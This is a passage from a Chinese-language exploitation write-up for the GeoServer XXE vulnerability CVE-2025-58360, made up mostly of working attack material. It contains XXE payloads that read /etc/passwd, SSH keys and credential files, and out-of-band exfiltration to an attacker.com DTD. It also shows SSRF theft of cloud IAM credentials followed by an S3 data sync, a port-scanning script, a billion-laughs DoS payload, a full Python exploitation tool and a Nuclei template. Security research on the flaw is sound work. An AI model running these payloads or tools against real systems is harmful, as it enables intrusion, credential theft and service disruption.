-H "Content-Type: application/xml" \
-d @payload.xml
步骤3 - 服务器处理:
WMS Controller接收请求
SLDParser解析XML
DocumentBuilder遇到DOCTYPE
解析
读取/etc/passwd文件内容
将内容存储在xxe实体中
遇到&xxe;
将文件内容插入到Name元素
layerName变量 = "root x :0:0:..."
步骤4 - 错误响应:
<?xml version="1.0"?>
<ServiceExceptionReport version="1.1.1">
<ServiceException>
Unknown layer: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
</ServiceException>
</ServiceExceptionReport>
步骤5 - 攻击者获取数据:
攻击者从ServiceException中提取完整的/etc/passwd文件内容。
6.2.2 参数实体攻击(OOB XXE)
当文件内容无法直接回显时,使用参数实体进行带外数据泄露。
攻击者服务器evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com:8000/?data=%file;'>">
%eval;
%exfil;
攻击payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY % dtd SYSTEM "http://attacker.com:8000/evil.dtd">
%dtd;
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>test</Name>
</NamedLayer>
</StyledLayerDescriptor>
执行流程:
解析器遇到
发起HTTP请求到attacker.com获取evil.dtd
解析evil.dtd定义的参数实体
%eval;展开,定义%exfil实体
%exfil;展开,触发对attacker.com的请求
请求URL包含/etc/passwd内容作为参数
攻击者HTTP服务器日志记录文件内容
攻击者服务器日志:
GET /?data=root:x:0:0:root:/root:/bin/bash%0Adaemon:x:1:1:...
6.2.3 SSRF攻击
利用XXE进行服务器端请求伪造:
探测AWS元数据:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
<Name>&xxe;</Name>
响应可能包含IAM角色名称:
<ServiceException>
Unknown layer: geoserver-role
</ServiceException>
获取IAM临时凭据:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/geoserver-role">
<Name>&xxe;</Name>
响应包含:
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "..."
}
内网服务探测:
<!-- 探测内网PostgreSQL -->
<!ENTITY xxe SYSTEM "http://10.0.1.100:5432/">
<!-- 探测内网Redis -->
<!ENTITY xxe SYSTEM "http://10.0.1.100:6379/">
<!-- 探测Kubernetes API -->
<!ENTITY xxe SYSTEM "http://10.96.0.1:443/">
通过响应时间和错误消息推断端口状态:
快速失败: 端口关闭
连接超时: 端口开放但服务不响应HTTP
特定错误: 端口开放且服务响应
6.3 漏洞利用条件
6.3.1 必要条件
触发漏洞的最小条件:
可访问的WMS端点
URL: /geoserver/wms 或 /wms
无需认证(公开访问)
支持POST方法
接受XML格式的SLD
Content-Type: application/xml
SLD_BODY参数或POST body
允许DOCTYPE声明
存在XXE漏洞
GeoServer版本 <= 2.26.1或<= 2.25.5
XML解析器未配置安全特性
外部实体解析未禁用
6.3.2 可选条件
提高利用成功率的条件:
错误信息详细输出
ServiceException包含完整错误
文件内容在错误消息中回显
未过滤敏感信息
宽松的网络策略
允许出站HTTP/HTTPS连接(OOB XXE)
可访问内网服务(SSRF)
可访问云元数据端点
高权限运行
GeoServer以root或管理员运行
可读取敏感系统文件
可访问其他用户目录
文件系统可读
已知GeoServer安装路径
data_dir位置可预测
敏感文件存在且可读
不需要的条件:
不需要GeoServer账户
不需要认证Token
不需要CSRF Token
不需要用户交互
不需要JavaScript执行
不需要社会工程
7. 利用方式
7.1 攻击向量分析
7.1.1 直接攻击向量
公网直接访问:
场景: GeoServer直接暴露在互联网上
端口: 通常为8080或80/443(反向代理)
发现方式: Shodan、ZoomEye、Fofa等搜索引擎
Shodan查询:
title:"GeoServer" port:8080攻击难度: 低
7.1.2 间接攻击向量
通过其他漏洞组合:
SSRF → GeoServer内网实例 → XXE
文件上传 → 上传恶意SLD文件 → XXE
XSS → 构造AJAX请求 → CSRF → XXE
内网渗透 → 访问内部GeoServer → XXE
7.2 利用方法
7.2.1 文件读取
实际复现的完整利用流程:
环境信息:
目标: http://localhost:8080/geoserver
GeoServer版本: 2.26.1 (kartoza/geoserver:2.26.1)
容器ID: a27840b7f332
测试时间: 2025-11-27
测试1 - 读取hostname:
Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
请求命令:
curl -X POST "http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
服务器响应:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE ServiceExceptionReport SYSTEM "http://localhost:8080/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd">
<ServiceExceptionReport version="1.1.1">
<ServiceException>
Unknown layer: a27840b7f332
</ServiceException>
</ServiceExceptionReport>
结果验证:
$ docker ps --format "{{.ID}} {{.Names}}" | grep geoserver
a27840b7f332 geoserver-vuln-cve-2025-58360
结论: 容器hostname与泄露值完全匹配,XXE攻击成功!
测试2 - 读取/etc/passwd:
Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
完整响应:
<ServiceException>
Unknown layer: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
geoserveruser:x:1000:1000::/home/geoserveruser/:/bin/bash
</ServiceException>
结果分析:
成功读取完整/etc/passwd文件
泄露24个用户账户信息
发现GeoServer运行用户: geoserveruser (UID 1000)
确认容器基于Debian/Ubuntu系统
常见目标文件清单:
Linux系统文件:
# 用户信息
file:///etc/passwd # 用户列表 (已验证成功)
file:///etc/shadow # 密码哈希(通常权限限制)
file:///etc/group # 组信息
file:///etc/hostname # 主机名 (已验证成功)
file:///etc/hosts # 主机映射
# 系统信息
file:///proc/version # 内核版本
file:///proc/self/environ # 环境变量
file:///proc/self/cmdline # 启动命令
file:///proc/net/tcp # TCP连接
file:///proc/net/fib_trie # 路由表
# SSH密钥
file:///root/.ssh/id_rsa # Root私钥
file:///home/geoserver/.ssh/id_rsa # 应用用户私钥
file:///home/geoserveruser/.ssh/id_rsa # GeoServer用户私钥
GeoServer配置文件:
# 核心配置
file:///opt/geoserver/data_dir/global.xml
file:///opt/geoserver/data_dir/logging.xml
file:///opt/geoserver/data_dir/wms.xml
# 安全配置
file:///opt/geoserver/data_dir/security/config.xml
file:///opt/geoserver/data_dir/security/usergroup/default/users.xml
file:///opt/geoserver/data_dir/security/role/default/roles.xml
file:///opt/geoserver/data_dir/security/masterpw/default/config.xml
# 数据存储配置(可能含数据库凭据)
file:///opt/geoserver/data_dir/workspaces/topp/datastore.xml
file:///opt/geoserver/data_dir/workspaces/*/datastore.xml
应用日志:
# GeoServer日志
file:///var/log/geoserver/geoserver.log
file:///opt/geoserver/logs/geoserver.log
# 系统日志
file:///var/log/syslog
file:///var/log/auth.log
Windows目标文件:
# 系统文件
file:///C:/Windows/win.ini
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/boot.ini
# GeoServer配置
file:///C:/Program Files/GeoServer/data_dir/global.xml
file:///C:/Program Files/GeoServer/data_dir/security/usergroup/default/users.xml
7.2.2 SSRF攻击
通过XXE执行服务器端请求伪造:
场景1 - AWS云环境:
步骤1: 探测元数据服务可用性
<!ENTITY xxe SYSTEM "http://169.254.169.254/">
<Name>&xxe;</Name>
步骤2: 列出IAM角色
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
<Name>&xxe;</Name>
响应示例:
<ServiceException>
Unknown layer: geoserver-ec2-role
</ServiceException>
步骤3: 获取临时凭据
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/geoserver-ec2-role">
<Name>&xxe;</Name>
泄露的凭据:
{
"Code" : "Success",
"LastUpdated" : "2025-11-27T01:23:45Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIAIOSFODNN7EXAMPLE",
"SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
"Token" : "IQoJb3JpZ2luX2VjEPD//////////...",
"Expiration" : "2025-11-27T07:49:39Z"
}
利用凭据:
export AWS_ACCESS_KEY_ID=ASIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEPD//////////...
# 列出S3存储桶
aws s3 ls
# 下载敏感数据
aws s3 sync s3://company-data /tmp/exfil
场景2 - 内网服务探测:
探测内网PostgreSQL数据库:
<!ENTITY xxe SYSTEM "http://10.0.1.100:5432/">
<Name>&xxe;</Name>
探测内网Redis:
<!ENTITY xxe SYSTEM "http://10.0.1.200:6379/">
<Name>&xxe;</Name>
探测Kubernetes API:
<!ENTITY xxe SYSTEM "https://10.96.0.1:443/api/v1/namespaces">
<Name>&xxe;</Name>
端口扫描脚本:
#!/bin/bash
TARGET_GEOSERVER="http://vulnerable-geoserver.com:8080"
INTERNAL_HOST="10.0.1.100"
for port in 22 80 443 3306 5432 6379 8080 9200; do
PAYLOAD="<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY xxe SYSTEM \"http://$INTERNAL_HOST:$port/\">]><StyledLayerDescriptor version=\"1.0.0\"><NamedLayer><Name>&xxe;</Name></NamedLayer></StyledLayerDescriptor>"
RESPONSE=$(curl -s -X POST "$TARGET_GEOSERVER/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD" \
--max-time 5)
if echo "$RESPONSE" | grep -q "ServiceException"; then
echo "Port $port: OPEN"
else
echo "Port $port: Filtered/Closed"
fi
done
场景3 - 云元数据访问:
Azure元数据:
<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">
<Name>&xxe;</Name>
Google Cloud元数据:
<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/">
<Name>&xxe;</Name>
Digital Ocean元数据:
<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/v1/">
<Name>&xxe;</Name>
7.2.3 拒绝服务(DoS)
Billion Laughs攻击:
Payload:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&lol9;</Name>
</NamedLayer>
</StyledLayerDescriptor>
影响:
实体扩展: 3^9 = 19,683个"lol"字符串
内存占用: 约200KB → 20MB(10层) → 3GB(更深层次)
CPU占用: 100%(解析和扩展)
服务响应: 超时或崩溃
大文件读取DoS:
<!ENTITY xxe SYSTEM "file:///dev/zero">
<Name>&xxe;</Name>
或读取大日志文件:
<!ENTITY xxe SYSTEM "file:///var/log/syslog">
<Name>&xxe;</Name>
影响:
内存占用: 持续增长直到OOM
I/O阻塞: 磁盘读取占用资源
请求超时: 其他用户无法访问
7.2.4 带外数据泄露(OOB XXE)
当文件内容无法直接回显时,使用OOB技术。
攻击者服务器准备:
启动HTTP服务器:
# 方法1: Python SimpleHTTPServer
cd /var/www/evil
python3 -m http.server 8000
# 方法2: Nginx
server {
listen 80;
server_name attacker.com;
root /var/www/evil;
access_log /var/log/nginx/xxe.log;
}
# 方法3: netcat监听
while true; do nc -lvp 8000; done
创建evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com:8000/exfil?data=%file;'>">
%eval;
%exfil;
攻击payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY % dtd SYSTEM "http://attacker.com:8000/evil.dtd">
%dtd;
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>test</Name>
</NamedLayer>
</StyledLayerDescriptor>
执行流程:
目标GeoServer解析XML
请求http://attacker.com:8000/evil.dtd
解析evil.dtd中的参数实体
%file; → 读取/etc/passwd
%eval; → 定义%exfil;实体
%exfil; → 发起HTTP请求
请求URL: http://attacker.com:8000/exfil?data=root:x:...
攻击者服务器日志:
10.0.1.50 - - [27/Nov/2025:01:50:33] "GET /evil.dtd HTTP/1.1" 200 -
10.0.1.50 - - [27/Nov/2025:01:50:34] "GET /exfil?data=root:x:0:0:root:/root:/bin/bash%0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin%0A... HTTP/1.1" 200 -
数据解码:
import urllib.parse
log_data = "root:x:0:0:root:/root:/bin/bash%0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin%0A..."
decoded = urllib.parse.unquote(log_data)
print(decoded)
输出:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
DNS OOB(更隐蔽):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://%file;.attacker.com'>">
%eval;
%exfil;
DNS日志:
a27840b7f332.attacker.com
7.3 自动化利用工具
7.3.1 专用Python工具
完整利用脚本:
#!/usr/bin/env python3
"""
GeoServer CVE-2025-58360 XXE完整利用工具
基于实际复现开发,仅用于授权安全测试
"""
import argparse
import sys
import requests
from urllib.parse import urljoin, quote
import urllib3
from colorama import Fore, Style, init
# 禁用SSL警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)
class GeoServerXXEExploiter:
def __init__(self, base_url, timeout=15, proxy=None):
self.base_url = base_url.rstrip('/')
self.timeout = timeout
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'GeoServer-Security-Test/1.0'
})
if proxy:
self.session.proxies = {
'http': proxy,
'https': proxy
}
self.session.verify = False
def banner(self):
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.CYAN} CVE-2025-58360 GeoServer XXE Exploitation Tool{Style.RESET_ALL}")
print(f"{Fore.CYAN} For Authorized Security Testing Only{Style.RESET_ALL}")
print(f"{Fore.CYAN} Based on Actual Reproduction (2025-11-27){Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}\n")
def craft_payload(self, entity_uri):
"""构造XXE payload"""
return f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "{entity_uri}">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'''
def craft_oob_payload(self, dtd_url):
"""构造OOB XXE payload"""
return f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY % dtd SYSTEM "{dtd_url}">
%dtd;
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>test</Name>
</NamedLayer>
</StyledLayerDescriptor>'''
def send_payload(self, payload):
"""发送payload到GeoServer"""
endpoint = urljoin(self.base_url, "/geoserver/wms")
params = {
"service": "WMS",
"version": "1.1.0",
"request": "GetMap",
"width": "100",
"height": "100",
"format": "image/png",
"bbox": "-180,-90,180,90"
}
headers = {"Content-Type": "application/xml"}
try:
response = self.session.post(
endpoint,
params=params,
data=payload,
headers=headers,
timeout=self.timeout
)
return {
"status_code": response.status_code,
"headers": dict(response.headers),
"text": response.text,
"success": self.check_response(response.text)
}
except requests.exceptions.Timeout:
return {"error": "Request timeout"}
except requests.exceptions.ConnectionError:
return {"error": "Connection failed"}
except Exception as e:
return {"error": str(e)}
def check_response(self, response_text):
"""检查响应是否表明漏洞存在"""
indicators = [
"java.io.filenotfoundexception",
"unknown layer:",
"root:x:",
"<?xml"
]
response_lower = response_text.lower()
return any(ind in response_lower for ind in indicators)
def test_vulnerability(self):
"""基础漏洞检测"""
print(f"{Fore.YELLOW}[*] Testing XXE vulnerability...{Style.RESET_ALL}")
# 使用实际复现中成功的payload
payload = self.craft_payload("file:///etc/hostname")
result = self.send_payload(payload)
if "error" in result:
print(f"{Fore.RED}[!] Error: {result['error']}{Style.RESET_ALL}")
return False
if result["success"]:
print(f"{Fore.RED}[!] VULNERABLE - XXE detected!{Style.RESET_ALL}")
# 尝试提取泄露的hostname
if "Unknown layer:" in result["text"]:
leaked = result["text"].split("Unknown layer:")[1].split("<")[0].strip()
print(f"{Fore.GREEN}[+] Leaked hostname: {leaked}{Style.RESET_ALL}")
return True
elif "entity resolution disallowed" in result["text"].lower():
print(f"{Fore.GREEN}[+] SAFE - XXE protection enabled{Style.RESET_ALL}")
return False
else:
print(f"{Fore.YELLOW}[?] UNKNOWN - Unable to determine{Style.RESET_ALL}")
return None
def read_file(self, file_path):
"""读取指定文件"""
print(f"{Fore.YELLOW}[*] Attempting to read: {file_path}{Style.RESET_ALL}")
payload = self.craft_payload(f"file://{file_path}")
result = self.send_payload(payload)
if "error" in result:
print(f"{Fore.RED}[!] Error: {result['error']}{Style.RESET_ALL}")
return None
if result["success"]:
# 提取文件内容
if "Unknown layer:" in result["text"]:
content = result["text"].split("Unknown layer:")[1]
content = content.split("</ServiceException>")[0].strip()
print(f"{Fore.GREEN}[+] File accessible!{Style.RESET_ALL}")
print(f"\n{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.CYAN}File: {file_path}{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(content[:2000]) # 限制输出长度
if len(content) > 2000:
print(f"\n{Fore.YELLOW}[...truncated...]{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}\n")
return content
else:
print(f"{Fore.YELLOW}[*] File may exist but content not returned{Style.RESET_ALL}")
return None
else:
print(f"{Fore.RED}[-] File not accessible{Style.RESET_ALL}")
return None
def ssrf_test(self, target_url):
"""SSRF测试"""
print(f"{Fore.YELLOW}[*] Testing SSRF to: {target_url}{Style.RESET_ALL}")
payload = self.craft_payload(target_url)
result = self.send_payload(payload)
if "error" in result:
print(f"{Fore.RED}[!] Error: {result['error']}{Style.RESET_ALL}")
return False
if result["success"]:
print(f"{Fore.GREEN}[+] SSRF successful!{Style.RESET_ALL}")
if "Unknown layer:" in result["text"]:
content = result["text"].split("Unknown layer:")[1].split("<")[0].strip()
print(f"{Fore.GREEN}[+] Response preview: {content[:200]}{Style.RESET_ALL}")
return True
else:
print(f"{Fore.RED}[-] SSRF failed or blocked{Style.RESET_ALL}")
return False
def oob_test(self, dtd_url):
"""OOB XXE测试"""
print(f"{Fore.YELLOW}[*] Testing OOB XXE with DTD: {dtd_url}{Style.RESET_ALL}")
payload = self.craft_oob_payload(dtd_url)
result = self.send_payload(payload)
if "error" in result:
print(f"{Fore.RED}[!] Error: {result['error']}{Style.RESET_ALL}")
return False
print(f"{Fore.YELLOW}[*] Payload sent. Check your server logs for incoming requests.{Style.RESET_ALL}")
return True
def auto_exploit(self):
"""自动利用 - 读取常见敏感文件"""
print(f"\n{Fore.YELLOW}[*] Starting automated exploitation...{Style.RESET_ALL}\n")
# 基于实际复现的目标文件列表
target_files = [
"/etc/hostname", # 实际复现成功
"/etc/passwd", # 实际复现成功
"/etc/hosts",
"/proc/version",
"/proc/self/environ",
"/opt/geoserver/data_dir/global.xml",
"/opt/geoserver/data_dir/security/usergroup/default/users.xml"
]
results = {}
for filepath in target_files:
content = self.read_file(filepath)
results[filepath] = {
"success": content is not None,
"content": content
}
# 汇总结果
print(f"\n{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.CYAN}Exploitation Summary{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
success_count = sum(1 for r in results.values() if r["success"])
print(f"{Fore.GREEN}[+] Successfully read: {success_count}/{len(target_files)} files{Style.RESET_ALL}")
for filepath, result in results.items():
status = f"{Fore.GREEN}SUCCESS{Style.RESET_ALL}" if result["success"] else f"{Fore.RED}FAILED{Style.RESET_ALL}"
print(f" {filepath}: {status}")
return results
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-58360 GeoServer XXE Exploitation Tool",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# 基础漏洞检测
python3 xxe_exploit.py -u http://target:8080
# 读取特定文件
python3 xxe_exploit.py -u http://target:8080 -f /etc/passwd
# 自动利用(读取常见文件)
python3 xxe_exploit.py -u http://target:8080 --auto
# SSRF测试
python3 xxe_exploit.py -u http://target:8080 --ssrf http://169.254.169.254/latest/meta-data/
# OOB XXE测试
python3 xxe_exploit.py -u http://target:8080 --oob http://attacker.com/evil.dtd
# 使用代理
python3 xxe_exploit.py -u http://target:8080 --proxy http://127.0.0.1:8080
"""
)
parser.add_argument("-u", "--url", required=True,
help="Target GeoServer base URL")
parser.add_argument("-f", "--file",
help="File path to read")
parser.add_argument("--ssrf",
help="URL for SSRF testing")
parser.add_argument("--oob",
help="DTD URL for OOB XXE testing")
parser.add_argument("--auto", action="store_true",
help="Automated exploitation (read common files)")
parser.add_argument("-t", "--timeout", type=int, default=15,
help="Request timeout in seconds (default: 15)")
parser.add_argument("--proxy",
help="HTTP proxy (e.g., http://127.0.0.1:8080)")
args = parser.parse_args()
exploiter = GeoServerXXEExploiter(args.url, args.timeout, args.proxy)
exploiter.banner()
print(f"{Fore.YELLOW}[*] Target: {args.url}{Style.RESET_ALL}")
if args.proxy:
print(f"{Fore.YELLOW}[*] Proxy: {args.proxy}{Style.RESET_ALL}")
print()
# 基础漏洞检测
is_vuln = exploiter.test_vulnerability()
if is_vuln is False:
print(f"\n{Fore.GREEN}[+] Target appears to be patched{Style.RESET_ALL}")
sys.exit(0)
elif is_vuln is None:
print(f"\n{Fore.YELLOW}[?] Vulnerability status unclear, continuing...{Style.RESET_ALL}")
# 高级利用
if args.file:
exploiter.read_file(args.file)
elif args.ssrf:
exploiter.ssrf_test(args.ssrf)
elif args.oob:
exploiter.oob_test(args.oob)
elif args.auto:
exploiter.auto_exploit()
print(f"\n{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Exploitation complete{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}\n")
if __name__ == "__main__":
main()
使用示例:
# 安装依赖
pip3 install requests colorama
# 基础检测(使用实际复现环境)
python3 xxe_exploit.py -u http://localhost:8080
# 读取/etc/passwd
python3 xxe_exploit.py -u http://localhost:8080 -f /etc/passwd
# 自动化利用
python3 xxe_exploit.py -u http://localhost:8080 --auto
# 通过Burp Suite代理
python3 xxe_exploit.py -u http://target:8080 --proxy http://127.0.0.1:8080
7.3.2 Nuclei模板
基于实际复现开发的Nuclei检测模板:
id: cve-2025-58360-geoserver-xxe
info:
name: GeoServer WMS SLD XXE (CVE-2025-58360)
author: security-research
severity: high
description: |
GeoServer WMS service is vulnerable to XML External Entity (XXE) injection
via StyledLayerDescriptor (SLD) processing in GetMap requests.
Verified through actual reproduction on 2025-11-27.
reference:
- https://github.com/advisories/GHSA-fjf5-xgmq-5525
- https://nvd.nist.gov/vuln/detail/CVE-2025-58360
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
cvss-score: 8.2
cve-id: CVE-2025-58360
cwe-id: CWE-611
metadata:
verified: true
max-request: 3
tags: cve,cve2025,geoserver,xxe,wms,sld,oob
variables:
hostname_payload: |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
passwd_payload: |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
http:
- raw:
- |
POST /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
{{hostname_payload}}
- |
POST /wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
{{hostname_payload}}
- |
POST /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
{{passwd_payload}}
matchers-condition: or
matchers:
- type: word
part: body
words:
- "Unknown layer:"
- "ServiceException"
condition: and
case-insensitive: true
- type: regex
part: body
regex:
- "Unknown layer:.*(root:x:|daemon:x:|bin:x:)"
- type: word
part: body
words:
- "java.io.FileNotFoundException"
- "file:///etc/"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- 'Unknown layer: ([a-zA-Z0-9]+)'
- 'Unknown layer: (root:x:.*)'
- type: kval
kval:
- content_type
使用方法:
# 安装Nuclei
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
# 单目标扫描
nuclei -t cve-2025-58360.yaml -u http://target:8080
# 批量扫描
nuclei -t cve-2025-58360.yaml -l targets.txt
# 输出详细结果
nuclei -t cve-2025-58360.yaml -u http://target:8080 -v -json -o results.json
8. 攻击链分析
8.1 完整攻击流程
典型的CVE-2025-58360攻击链:
阶段1: 侦察
├── 搜索引擎: Shodan/ZoomEye发现GeoServer实例
├── 指纹识别: 确认GeoServer版本
└── 端点枚举: 发现/geoserver/wms端点
↓
阶段2: 漏洞验证
├── 发送基础XXE payload (file:///etc/hostname)
├── 检查响应: "Unknown layer: container-id"
└── 确认漏洞存在
↓
阶段3: 信息收集
├── 读取/etc/passwd: 获取用户列表
├── 读取GeoServer配置: 获取数据库凭据
├── 读取SSH密钥: 寻找横向移动机会
└── SSRF探测内网: 发现内部服务
↓
阶段4: 权限提升
├── 使用泄露的凭据登录GeoServer管理界面
├── 或使用SSH密钥登录服务器
└── 或利用SSRF访问内网服务
↓
阶段5: 持久化
├── 添加后门账户
├── 修改启动脚本
└── 植入Web Shell
↓
阶段6: 横向移动
├── 使用数据库凭据访问后端数据库
├── 从数据库获取更多凭据
└── 渗透其他内网主机
↓
阶段7: 目标达成
